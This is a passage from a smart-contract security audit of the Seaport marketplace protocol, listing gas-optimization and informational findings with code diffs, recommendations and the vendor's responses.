gets cleaned, one can avoid this cleaning procedure 58 PUSH1 0xA0 58 PUSH1 0x5 56 PUSH1 0x1C 43 PUSH1 0x24 38 PUSH1 0xC0 24 PUSH1 0x44 24 PUSH1 0x3 23 PUSH4 0xFFFFFFFF 23 PUSH1 0xE0 21 PUSH1 0x2 20 PUSH8 0xFFFFFFFFFFFFFFFF 17 PUSH32 0x0 17 PUSH1 0x64 16 PUSH15 0xFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF 15 PUSH32 0xFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFC 10 PUSH1 0xFF 10 PUSH1 0xA4 9 PUSH5 0x1FFFFFFFE0 9 PUSH1 0xC4 9 PUSH1 0x6 9 PUSH1 0x1F 8 PUSH32 0xFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFE0 8 PUSH1 0x84 8 PUSH1 0x10 6 PUSH32 0x4CE34AA200000000000000000000000000000000000000000000000000000000 6 PUSH1 0x88 5 PUSH32 0xFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF 4 PUSH32 0xFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF00 4 PUSH32 0x4E487B7100000000000000000000000000000000000000000000000000000000 4 PUSH1 0xE4 4 PUSH1 0x9 4 PUSH1 0x8 4 PUSH1 0x22 3 PUSH4 0xFB5014FC 3 PUSH4 0xF486BC87 3 PUSH4 0x5F15D672 3 PUSH4 0x1A783B8D 3 PUSH32 0xFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFE4 3 PUSH32 0xFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFC4 3 PUSH32 0x9D9AF8E38D66C62E2C12F0225249FD9D721C54B83F48D9352C97C6CACDCB6F31 3 PUSH1 0x41 3 PUSH1 0x11 2 PUSH4 0xD13D53D4 2 PUSH4 0x93979285 2 PUSH4 0x4E487B71 2 PUSH4 0x375C24C1 2 PUSH4 0x1A515574 2 PUSH4 0x17B1F942 2 PUSH32 0xFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFE1 2 PUSH32 0xFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFC0 2 PUSH32 0xFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF00000000000000000000000000000000FF 2 PUSH32 0xFFFFFFFF00000000000000000000000000000000000000000000000000000000 2 PUSH32 0x23B872DD00000000000000000000000000000000000000000000000000000000 2 PUSH32 0x1901000000000000000000000000000000000000000000000000000000000000 42 2 PUSH3 0xFFFFE0 2 PUSH21 0xFF0000000000000000000000000000000000000000 2 PUSH17 0xFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF0000 2 PUSH1 0xB 2 PUSH1 0x7 2 PUSH1 0x55 2 PUSH1 0x45 2 PUSH1 0x42 2 PUSH1 0x3F 2 PUSH1 0x1D 1 PUSH8 0x7536561706F7274 1 PUSH5 0x736F6C6343 1 PUSH5 0x3FFFFFFFC0 1 PUSH5 0x101000000 1 PUSH4 0xFD9F1E10 1 PUSH4 0xFB0F3EE1 1 PUSH4 0xF4DD92CE 1 PUSH4 0xF47B7740 1 PUSH4 0xF07EC373 1 PUSH4 0xEE9E0E63 1 PUSH4 0xED98A574 1 PUSH4 0xE7ACAB24 1 PUSH4 0xD6929332 1 PUSH4 0xD5DA9A1B 1 PUSH4 0xC63CF089 1 PUSH4 0xBFB3F8CE 1 PUSH4 0xBCED929D 1 PUSH4 0xBA832FDD 1 PUSH4 0xB3A34C4C 1 PUSH4 0xA900866B 1 PUSH4 0xA8930E9A 1 PUSH4 0xA8174404 1 PUSH4 0xA61BE9F0 1 PUSH4 0xA5F54208 1 PUSH4 0xA11B63FF 1 PUSH4 0x9BDE339 1 PUSH4 0x98E9DB6E 1 PUSH4 0x98919765 1 PUSH4 0x98891923 1 PUSH4 0x94EB6AF6 1 PUSH4 0x91B3E514 1 PUSH4 0x8BAA579F 1 PUSH4 0x88147732 1 PUSH4 0x87201B41 1 PUSH4 0x815E1D64 1 PUSH4 0x80EC7374 1 PUSH4 0x7FDA7279 1 PUSH4 0x7FA8A987 1 PUSH4 0x79DF72BD 1 PUSH4 0x6FDDE03 1 PUSH4 0x6AB37CE7 1 PUSH4 0x69F95827 1 PUSH4 0x6088D7DE 1 PUSH4 0x5B34B966 1 PUSH4 0x5A052B32 1 PUSH4 0x55944A42 1 PUSH4 0x4F7FB80D 1 PUSH4 0x470C7C1D 1 PUSH4 0x466AA616 1 PUSH4 0x46423AA7 1 PUSH4 0x39F3E3FD 1 PUSH4 0x3312E32 43 1 PUSH4 0x21CCFEB7 1 PUSH4 0x1F003D0A 1 PUSH4 0x1CF99B26 1 PUSH4 0x133C37C6 1 PUSH4 0x12D3F5A3 1 PUSH4 0x10FDA3E1 1 PUSH32 0xFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFE 1 PUSH32 0xFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFBF 1 PUSH32 0xFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFBC 1 PUSH32 0xFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF9D 1 PUSH32 0xFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFEA1 1 PUSH32 
0xFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF0000 1 PUSH32 0xFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF0000000000000000000000000000000000 1 PUSH32 0xF280791EFE782EDCF06CE15C8F4DFF17601DB3B88EB3805A0DB7D77FAF757F04 1 PUSH32 0xF242432A00000000000000000000000000000000000000000000000000000000 1 PUSH32 0x7FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF 1 PUSH32 0x721C20121297512B72821B97F5326877EA8ECF4BB9948FEA5BFCB6453074D37F 1 PUSH32 0x6BACC01DBE442496068F7D234EDD811F1A5F833243E0AEC824F86AB861F3C90D 1 PUSH32 0x1626BA7E00000000000000000000000000000000000000000000000000000000 1 PUSH18 0x10000000000000000000000000000010001 1 PUSH17 0xFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF 1 PUSH12 0xFFFFFFFFFFFFFFFFFFFFFFFF 1 PUSH1 0xE8 1 PUSH1 0xE3 1 PUSH1 0x63 1 PUSH1 0x47 1 PUSH1 0x32 1 PUSH1 0x23 1 PUSH1 0x21 1 PUSH1 0x1B 1 PUSH1 0x18 • PUSH32 0x0000000000000000000000000000000000000000000000000000000000000000 Not sure, why the compiler is including these long pushN 0s, they can be replaced to push1 0. Filed an issue for it here: Issue 13834 They might correspond to immutables that will be filled at a later stage (loadimmutable("dddd")). • PUSH32 0xFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFC This push32 is used by the compiler when dispatching to make sure the calldatasize is at least the minimum number required by the external endpoint. Refer to for optimization to use fallback to circumvent soliditys dispatcher mechanism. • PUSH32 0x4CE34AA200000000000000000000000000000000000000000000000000000000 This value is used for Conduit_execute_signature when populating a memory region to call a conduit: // Write ConduitInterface.execute.selector to memory. mstore(callDataOffset, Conduit_execute_signature) One can start the execute data at the same offset as the errors 0x1c so that this value is reduced to PUSH4 0x4CE34AA2. This might add 3 gas (due to calculating the offset) for some runtime routes which might not be ideal. • PUSH32 0xFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF00 • PUSH32 0xFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF00000000000000000000000000000000FF • PUSH32 0xFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF0000 • PUSH32 0xFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF0000000000000000000000000000000000 These masks are used when storing orderStatus values, the following issue should solve using these masks 44 • The arithmetic in _validateOrderAndUpdateStatus can be simplified/optimized • PUSH32 0xFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFC • PUSH32 0xFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFE0 • PUSH32 0xFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF • PUSH32 0xFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFE4 • PUSH32 0xFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFE1 • PUSH32 0xFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFC0 • PUSH32 0xFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFE • PUSH32 0xFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFBF • PUSH32 0xFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFBC • PUSH32 0xFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF9D • PUSH32 0xFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFEA1 These constants are used when the optimizer transforms sub(X, C) into add(X, -C) (here X is a variable and C is a constant). 
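To illustrate the PUSH20 masking cost mentioned in the last bullet, here is a minimal sketch (a hypothetical contract): high-level access to an address struct field emits the 160-bit cleanup mask, while an assembly load of the same word does not.

// SPDX-License-Identifier: MIT
pragma solidity ^0.8.17;

contract AddressMaskDemo {
    struct A {
        address addr;
    }

    // Compiles to and(mload(...), 0xff..ff) -- the PUSH20 mask above.
    function masked(A memory a) public pure returns (address) {
        return a.addr;
    }

    // Loads the full word with no cleanup; safe only when the decoder
    // already guarantees the upper 96 bits of the slot are zero.
    function rawWord(A memory a) public pure returns (uint256 raw) {
        assembly {
            raw := mload(a)
        }
    }
}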
This Expression Simplifier optimization step performs the transform so that the commutative operation add is used instead, which allows one to move constants around and potentially combine them. When this optimization rule does not add any benefit and C is a relatively small value, the transformation can grow the bytecode size. To prevent the optimizer steps from performing this transformation, one can use verbatim statements in Yul:

    /* let y := sub(x, 0xcc)
     * 60cc | push1 0xcc
     * 90   | swap1
     * 03   | sub
     */
    let y := verbatim_1i_1o(hex"60cc_90_03", x)

Depending on how solc juggles the stack around, the above suggestion might reduce the code size and might not change the runtime gas (one would need to run a gas diff). The above can be applied, for example, when one does:

    height := div(sub(fullLength, signatureLength), 0x20)
    // or
    sub(length, BulkOrderProof_minSize)

• PUSH20 0xFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF
See "Some address fields are masked even though the ConsiderationDecoder wanted to skip this masking".

Seaport: Acknowledged.
Spearbit: Acknowledged.

+5.3.17 Use fallback() to circumvent Solidity's dispatcher mechanism
Severity: Gas Optimization
Context: • Consideration.sol#L39
Description: Among other things, the optimization steps add extra bytecode that is unnecessary for the dispatching mechanism. For example, the Expression Simplifier transforms the following calldata size comparison:

    // slt(sub(calldatasize(), 4), X)
    push1 0x4
    calldatasize
    sub
    slt

into:

    // slt(add(calldatasize(), 0xfffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffc), X)
    push32 0xfffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffc
    calldatasize
    add
    slt

And this happens for each exposed endpoint. This particular optimization rule is helpful when one can reorder and combine the constant value with another one (A + (X - B) -> (A - B) + X, where A and B are constants and X is a variable). But in this particular instance the dispatcher performs neither better nor worse in terms of runtime gas (it stays the same), while the optimization grows the bytecode size.
• Note: The final bytecode depends on the options provided to solc. For the above finding, the default hardhat settings are used without the NO_SPECIALIZER flag.
Recommendation: We can take advantage of the fallback() function to avoid the above scenarios. All external functions would need to be removed, and the dispatching would need to happen manually in the fallback() function.
Seaport: Acknowledged.
Spearbit: Acknowledged.
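For illustration, a minimal sketch of such a manual dispatcher. The contract name, endpoints, and selector values below are hypothetical placeholders, not Seaport's implementation:

    // SPDX-License-Identifier: MIT
    pragma solidity ^0.8.17;

    contract ManualDispatch {
        fallback() external payable {
            assembly {
                // Read the 4-byte selector from the start of calldata.
                let selector := shr(224, calldataload(0))

                // 0xAAAAAAAA: placeholder selector for a hypothetical
                // endpoint that takes one uint256 argument.
                if eq(selector, 0xAAAAAAAA) {
                    // Hand-written minimum-calldatasize check, using
                    // sub/slt so no PUSH32 constant is emitted.
                    if slt(sub(calldatasize(), 4), 32) { revert(0, 0) }
                    // ... endpoint body ...
                    return(0, 0)
                }

                // 0xBBBBBBBB: placeholder selector for a second endpoint.
                if eq(selector, 0xBBBBBBBB) {
                    // ... endpoint body ...
                    return(0, 0)
                }

                // Unknown selector.
                revert(0, 0)
            }
        }
    }

With this pattern the calldata size checks are written once by hand, so the compiler's per-endpoint PUSH32-based comparisons never appear in the bytecode.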
+5.3.18 The arithmetic in _validateOrderAndUpdateStatus can be simplified/optimized
Severity: Gas Optimization
Context: • OrderValidator.sol#L107 • OrderValidator.sol#L192-L291
Description: The arithmetic involving advancedOrder.numerator, advancedOrder.denominator, orderStatus.numerator and orderStatus.denominator contains multiple nested if/else blocks, and for certain conditions/paths extra operations are performed.

variable | description
na       | advancedOrder.numerator
da       | advancedOrder.denominator
ns       | orderStatus.numerator
ds       | orderStatus.denominator

Depending on the case, the final outputs need to be (a plain-Solidity sketch of the four cases follows the list):

• Case 1. ds = 0. In this case na and da will be unmodified (besides the constraint checks):
  (na, ns, da, ds) = (na, na, da, da)

• Case 2. ds ≠ 0, da = 1. In this case the remainder of the order will be filled:
  (na, ns, da, ds) = (ds − ns, ds, ds, ds)
  Note that the invariant d ≥ n is always guaranteed for new fractions and the combined ones, so ds − ns would not underflow.

• Case 3. ds ≠ 0, da ≠ 1, da = ds. Below, ε = (na + ns > ds)(na + ns − ds) is chosen so that the order would not be overfilled. The parameters used in calculating ε are taken before they have been updated:
  (na, ns, da, ds) = (na − ε, na + ns − ε, ds, ds)

• Case 4. ds ≠ 0, da ≠ 1, da ≠ ds. Below, ε = (na·ds + ns·da > da·ds)(na·ds + ns·da − da·ds) is chosen so that the order would not be overfilled. In case the new values go beyond 120 bits, G = gcd(na·ds − ε, na·ds + ns·da − ε, da·ds); otherwise G will be 1. The parameters used in calculating ε and G are taken before they have been updated:
  (na, ns, da, ds) = (1/G)(na·ds − ε, na·ds + ns·da − ε, da·ds, da·ds)
  If one of the updated values occupies more than 120 bits, the call will be reverted.
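A plain-Solidity sketch of the four cases, for illustration only: it omits the 120-bit overflow checks and the gcd reduction, and the function name is hypothetical rather than Seaport's:

    // Combine a supplied fraction na/da with the stored filled fraction
    // ns/ds, returning (numerator to fill now, new stored numerator,
    // new denominator). Mirrors Cases 1-4 above.
    function combineFractions(
        uint256 na, uint256 da,
        uint256 ns, uint256 ds
    ) pure returns (uint256, uint256, uint256) {
        // Case 1: nothing filled yet; store the supplied fraction as-is.
        if (ds == 0) return (na, na, da);
        // Case 2: a denominator of 1 fills everything that remains.
        if (da == 1) return (ds - ns, ds, ds);
        if (da == ds) {
            // Case 3: same denominator; cap so the order is not overfilled.
            uint256 sum = na + ns;
            uint256 eps = sum > ds ? sum - ds : 0;
            return (na - eps, sum - eps, ds);
        }
        // Case 4: different denominators; scale both fractions to the
        // common denominator da*ds, then cap as in Case 3.
        uint256 n = na * ds;
        uint256 s = na * ds + ns * da;
        uint256 d = da * ds;
        uint256 eps4 = s > d ? s - d : 0;
        return (n - eps4, s - eps4, d);
    }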
Recommendation: It would be best to rewrite the logic for when fractions are combined, both for better readability and in a more optimized way. Rough diff draft below:

diff --git a/contracts/lib/ConsiderationConstants.sol b/contracts/lib/ConsiderationConstants.sol
index 0879b60d..cde8b9d4 100644
--- a/contracts/lib/ConsiderationConstants.sol
+++ b/contracts/lib/ConsiderationConstants.sol
@@ -102,6 +102,10 @@ uint256 constant AdvancedOrder_denominator_offset = 0x40;
 uint256 constant AdvancedOrder_signature_offset = 0x60;
 uint256 constant AdvancedOrder_extraData_offset = 0x80;

+uint256 constant OrderStatus_ValidatedAndNotCancelled = 1;
+uint256 constant OrderStatus_filledNumerator_offset = 0x10;
+uint256 constant OrderStatus_filledDenominator_offset = 0x88;
+
 uint256 constant AlmostOneWord = 0x1f;
 uint256 constant OneWord = 0x20;
 uint256 constant TwoWords = 0x40;
diff --git a/contracts/lib/OrderValidator.sol b/contracts/lib/OrderValidator.sol
index f57528b2..f6c373a5 100644
--- a/contracts/lib/OrderValidator.sol
+++ b/contracts/lib/OrderValidator.sol
@@ -100,9 +100,9 @@ contract OrderValidator is Executor, ZoneInteraction {
      *         order is invalid due to the time or status.
      *
      * @return orderHash      The order hash.
-     * @return newNumerator   A value indicating the portion of the order that
+     * @return numerator      A value indicating the portion of the order that
      *                        will be filled.
-     * @return newDenominator A value indicating the total size of the order.
+     * @return denominator    A value indicating the total size of the order.
      */
     function _validateOrderAndUpdateStatus(
         AdvancedOrder memory advancedOrder,
@@ -111,8 +111,8 @@ contract OrderValidator is Executor, ZoneInteraction {
         internal
         returns (
             bytes32 orderHash,
-            uint256 newNumerator,
-            uint256 newDenominator
+            uint256 numerator,
+            uint256 denominator
         )
     {
         // Retrieve the parameters for the order.
@@ -144,8 +144,18 @@ contract OrderValidator is Executor, ZoneInteraction {
         }

         // Read numerator and denominator from memory and place on the stack.
-        uint256 numerator = uint256(advancedOrder.numerator);
-        uint256 denominator = uint256(advancedOrder.denominator);
+        // Overflowed values would be masked.
+        assembly {
+            numerator := and(
+                mload(add(advancedOrder, AdvancedOrder_numerator_offset)),
+                MaxUint120
+            )
+            denominator := and(
+                mload(add(advancedOrder, AdvancedOrder_denominator_offset)),
+                MaxUint120
+            )
+        }

         // Ensure that the supplied numerator and denominator are valid.
         if (numerator > denominator || numerator == 0) {
@@ -189,43 +199,85 @@ contract OrderValidator is Executor, ZoneInteraction {
             );
         }

-        // Read filled amount as numerator and denominator and put on the stack.
-        uint256 filledNumerator = orderStatus.numerator;
-        uint256 filledDenominator = orderStatus.denominator;
-
-        // If order (orderStatus) currently has a non-zero denominator it is
-        // partially filled.
-        if (filledDenominator != 0) {
-            // If denominator of 1 supplied, fill all remaining amount on order.
-            if (denominator == 1) {
-                // Scale numerator & denominator to match current denominator.
-                numerator = filledDenominator;
-                denominator = filledDenominator;
-            }
-            // Otherwise, if supplied denominator differs from current one...
-            else if (filledDenominator != denominator) {
-                // scale current numerator by the supplied denominator, then...
-                filledNumerator *= denominator;
-
-                // the supplied numerator & denominator by current denominator.
-                numerator *= filledDenominator;
-                denominator *= filledDenominator;
-            }
-
-            // Once adjusted, if current+supplied numerator exceeds denominator:
-            if (filledNumerator + numerator > denominator) {
-                // Skip underflow check: denominator >= orderStatus.numerator
-                unchecked {
-                    // Reduce current numerator so it + supplied = denominator.
-                    numerator = denominator - filledNumerator;
-                }
-            }
-
-            // Increment the filled numerator by the new numerator.
-            filledNumerator += numerator;
+        assembly {
+            let orderStatusSlot := orderStatus.slot
+            // Read filled amount as numerator and denominator, put on the stack.
+            let filledNumerator := sload(orderStatusSlot)
+            let filledDenominator := shr(
+                OrderStatus_filledDenominator_offset,
+                filledNumerator
+            )
+
+            for {} 1 {} {
+                if iszero(filledDenominator) {
+                    filledNumerator := numerator
+                    break
+                }
+
+                // Shift and mask to calculate the current filled numerator.
+                filledNumerator := and(
+                    shr(OrderStatus_filledNumerator_offset, filledNumerator),
+                    MaxUint120
+                )
+
+                // If denominator of 1 supplied, fill all remaining amount on order.
+                if eq(denominator, 1) {
+                    numerator := sub(filledDenominator, filledNumerator)
+                    denominator := filledDenominator
+                    filledNumerator := filledDenominator
+                    break
+                }
+
+                // If the supplied denominator equals the current one:
+                if eq(denominator, filledDenominator) {
+                    // Increment the filled numerator by the new numerator.
+                    filledNumerator := add(numerator, filledNumerator)
+
+                    // Once adjusted, if current+supplied numerator exceeds denominator:
+                    let _carry := mul(
+                        sub(filledNumerator, denominator),
+                        gt(filledNumerator, denominator)
+                    )
+                    numerator := sub(numerator, _carry)
+                    filledNumerator := sub(filledNumerator, _carry)
+                    break
+                }
+
+                // Otherwise, the supplied denominator differs from the current one:
+                filledNumerator := mul(filledNumerator, denominator)
+                numerator := mul(numerator, filledDenominator)
+                denominator := mul(denominator, filledDenominator)
+                // Increment the filled numerator by the new numerator.
+                filledNumerator := add(numerator, filledNumerator)
+
+                // Once adjusted, if current+supplied numerator exceeds denominator:
+                let _carry := mul(
+                    sub(filledNumerator, denominator),
+                    gt(filledNumerator, denominator)
+                )
+                numerator := sub(numerator, _carry)
+                filledNumerator := sub(filledNumerator, _carry)

                // Use assembly to ensure fractional amounts are below max uint120.
                // Check filledNumerator and denominator for uint120 overflow.
                if or(
                    gt(filledNumerator, MaxUint120),
@@ -267,28 +319,25 @@ contract OrderValidator is Executor, ZoneInteraction {
                    // Store the arithmetic (0x11) panic code.
                    mstore(Panic_error_code_ptr, Panic_arithmetic)
                    // revert(abi.encodeWithSignature("Panic(uint256)", 0x11))
-                   revert(0x1c, Panic_error_length)
+                   revert(Error_selector_offset, Panic_error_length)
                }
+               break
+           }

-        // Skip overflow check: checked above unless numerator is reduced.
-        unchecked {
-            // Update order status and fill amount, packing struct values.
-            orderStatus.isValidated = true;
-            orderStatus.isCancelled = false;
-            orderStatus.numerator = uint120(filledNumerator);
-            orderStatus.denominator = uint120(denominator);
-        }
-        } else {
-            // Update order status and fill amount, packing struct values.
-            orderStatus.isValidated = true;
-            orderStatus.isCancelled = false;
-            orderStatus.numerator = uint120(numerator);
-            orderStatus.denominator = uint120(denominator);
-        }
+            // [denominator: 15 bytes] [numerator: 15 bytes]
+            // [isCancelled: 1 byte] [isValidated: 1 byte]
+            sstore(
+                orderStatusSlot,
+                or(
+                    OrderStatus_ValidatedAndNotCancelled,
+                    or(
+                        shl(OrderStatus_filledNumerator_offset, filledNumerator),
+                        shl(OrderStatus_filledDenominator_offset, denominator)
+                    )
+                )
+            )
+        }

         // Return order hash, a modified numerator, and a modified denominator.
         return (orderHash, numerator, denominator);
     }

Seaport: Fixed in PR 818.
Spearbit: Verified.

+5.3.19 Redundant use of OffsetOrLengthMask
Severity: Gas Optimization
Context: ConsiderationEncoder.sol#L59
Description:

    unchecked {
        size =
            ((src.readUint256() & OffsetOrLengthMask) + AlmostTwoWords) &
            OnlyFullWordMask;
        ...
    }

The mask in (src.readUint256() & OffsetOrLengthMask) is redundant, and the following expression is equivalent:

    size = (src.readUint256() + AlmostTwoWords) & OnlyFullWordMask;

Seaport: Fixed in PR 798.
Spearbit: Verified.

5.4 Informational

+5.4.1 Deviations between standard ABI routines and abi-lity
Severity: Informational
Context: • ConsiderationEncoder.sol • ConsiderationDecoder.sol
Description:
1. readMaskedUint256: masks the higher-order bits for calldata pointers. In high-level Solidity, this would revert.
2. readBool, etc.: does not check the higher-order bits, nor clean the value. In high-level Solidity, this would revert.
3. readInt8, etc.: similar to the readBool case. This is interesting because sometimes a signextend may be needed, if the value is used with sdiv or smod.
4. abi_encode_bytes does not clean up data at the end of the last word. For example, consider a bytes memory of length 8. Then the routine copies 64 bytes of data; however, we can only guarantee the integrity of the first 32 + 8 = 40 bytes.
5. abi_decode_bytes has the same types of issues as abi_encode_bytes.
6. abi_decode_generateOrder_returndata expects stricter ABI encoding, i.e., the encoding cannot have any extra data.
Seaport: Acknowledged.
Spearbit: Acknowledged.
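For illustration, a minimal sketch of the deviation in item (2), using a hypothetical helper name (the actual routines live in PointerLibraries and ConsiderationDecoder):

    // A raw calldata read of a bool keeps whatever higher-order bits the
    // caller supplied; high-level Solidity would instead validate the
    // word and revert on anything other than 0 or 1.
    function readBoolUnchecked(uint256 cdPtr) pure returns (bool value) {
        assembly {
            value := calldataload(cdPtr) // no cleanup, no validation
        }
    }

Any nonzero word decodes as true here, so a caller can smuggle dirty bits through a value that high-level decoding would have rejected.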
+5.4.2 The magic return value checks can be made stricter
Severity: Informational
Context: ZoneInteraction.sol#L186
Description: The magic return value check for ZoneInteraction can be made stricter:
1. It does not check the lower 28 bytes of the return value.
2. It does not check whether the extcodesize() of the zone is non-zero. In particular, the magic check would pass for the identity precompile. This is, however, a general issue with the pattern where magic values are the same as the function selector, and is not specific to the Zone.
Recommendation: The following snippet would additionally check that the lower 28 bytes of the returndata are also 0. This would also save some gas.

    // The data [4:32) is 0.
    let magic := mload(callData)
    // Uses a stricter ABI standard, the lower bits are also checked.
    magicMatch := eq(magic, mload(0))

If we want the magic return value check to fail for the identity precompile, then the call should be prefaced by an extcodesize() check. This would, however, increase the gas cost by 100.
Seaport: It's probably a little safer to mask calldata and compare to an unshifted mload, to also check that the 28 lower bits are empty or unreturned. This was changed in PR 800 to:

    let magic := and(mload(callData), MaskOverFirstFourBytes)
    magicMatch := eq(magic, mload(0))

Spearbit: Verified.

+5.4.3 Resolving additional offer items supplied by contract orders with criteria can be impractical
Severity: Informational
Context: CriteriaResolution.sol#L43
Description: Contract orders can supply additional offer amounts when the order is executed. However, if they supply extra offer items with criteria on the fly, the fulfiller won't be able to supply the necessary criteria resolvers (the correct Merkle proofs). This can lead to flaky orders that are impractical to fulfill.
Recommendation: Contract offerers should avoid mismatches between previewOrder and what's executed on-chain. This can be impractical for complex orders. However, offering additional offer items with criteria is something a contract offerer should rarely do, and it should be discouraged. Also see "Empty criteriaResolvers for criteria-based contract orders".
Seaport: Acknowledged.
Spearbit: Acknowledged.

+5.4.4 Use of confusing named constant SpentItem_size in a function that deals with only ReceivedItem
Severity: Informational
Context: ConsiderationDecoder.sol#L568
Description: The named constant SpentItem_size is used in the function copyReceivedItemsAsConsiderationItems, even though the context has nothing to do with SpentItem.
Recommendation: Consider making a new named constant and replacing the usage.
Seaport: Fixed in commit 3f2312.
Spearbit: Verified.
+5.4.5 The ABI-decoding of generateOrder returndata does not have sufficient checks to prevent out-of-bounds returndata reads
Severity: Informational
Context: ConsiderationDecoder.sol#L456-L461
Description: There was some attempt to avoid out-of-bounds returndata access in the ConsiderationDecoder. However, the two returndatacopy(...) calls in ConsiderationDecoder.sol#L456-L461 can still lead to out-of-bounds access and therefore may revert. Assume that execution reaches the line ConsiderationDecoder.sol#L456. We have the following constraints:
1. returndatasize >= 4 * 32: ConsiderationDecoder.sol#L428
2. offsetOffer <= returndatasize: ConsiderationDecoder.sol#L444
3. offsetConsideration <= returndatasize: ConsiderationDecoder.sol#L445
If we pick a returndata that satisfies 1 and let offsetOffer == offsetConsideration == returndatasize, all the constraints hold, but the returndatacopy would revert due to an out-of-bounds read.
Note: High-level Solidity avoids reading from out-of-bounds returndata. This is usually done by checking that returndatasize() is large enough for static data types and by always doing returndatacopy of the form returndatacopy(x, 0, returndatasize()).
Recommendation:
1. If the current behaviour is desired, it's worth documenting those two returndatacopy(...) calls that can lead to OOB access.
2. If a high-level revert with additional revert data is desired, just like the other cases with OOB returndata access, then consider adding checks similar to:

    - let invalidOfferOffset := gt(offsetOffer, returndatasize())
    + let invalidOfferOffset := gt(add(offsetOffer, 0x20), returndatasize())

A similar check applies for offsetConsideration as well. However, as with any ABI offset calculations, any add(...) will need to be carefully examined to see if it can overflow.
Seaport: Acknowledged.
Spearbit: Acknowledged.
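For illustration, a minimal sketch of the guarded pattern from item (2) of the recommendation, with hypothetical names:

    contract ReturndataGuard {
        // Copy one 32-byte head word from returndata at `offset` into
        // memory at `dst`, reverting explicitly (instead of triggering a
        // low-level returndatacopy fault) when the word would extend past
        // the end of returndata.
        function _copyReturndataWordChecked(uint256 dst, uint256 offset) internal view {
            assembly {
                // As noted above, the add(...) should be examined for
                // overflow in its concrete context.
                if gt(add(offset, 0x20), returndatasize()) {
                    revert(0, 0) // or bubble a typed error
                }
                returndatacopy(dst, offset, 0x20)
            }
        }
    }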
+5.4.6 Document that contract orders do not support Seaport-native Dutch or English auctions
Severity: Informational
Context: • ConsiderationEncoder.sol#L440-L443 • ContractOffererInterface.sol#L7
Description: Seaport supports native Dutch and English auctions by allowing the startPrice and endPrice of an offer or consideration item to be different. In this case, the current price is derived by interpolating between the two prices. In the case of contract orders, the low-level ABI encoding for generateOrder does not interpolate the price. Instead, it uses the value of startAmount and assumes that both values are the same.
Seaport: Acknowledged.
Spearbit: Acknowledged.

+5.4.7 Consider renaming writeBytes to writeBytes32
Severity: Informational
Context: PointerLibraries.sol#L3064
Description: The function name writeBytes is not accurate in this context.
Recommendation:

    - function writeBytes(MemoryPointer mPtr, bytes32 value) internal pure {
    + function writeBytes32(MemoryPointer mPtr, bytes32 value) internal pure {
          assembly {
              mstore(mPtr, value)
          }
      }

Seaport: Fixed in commit 25af190.
Spearbit: Verified.

+5.4.8 Zones no longer have access to any criteria information
Severity: Informational
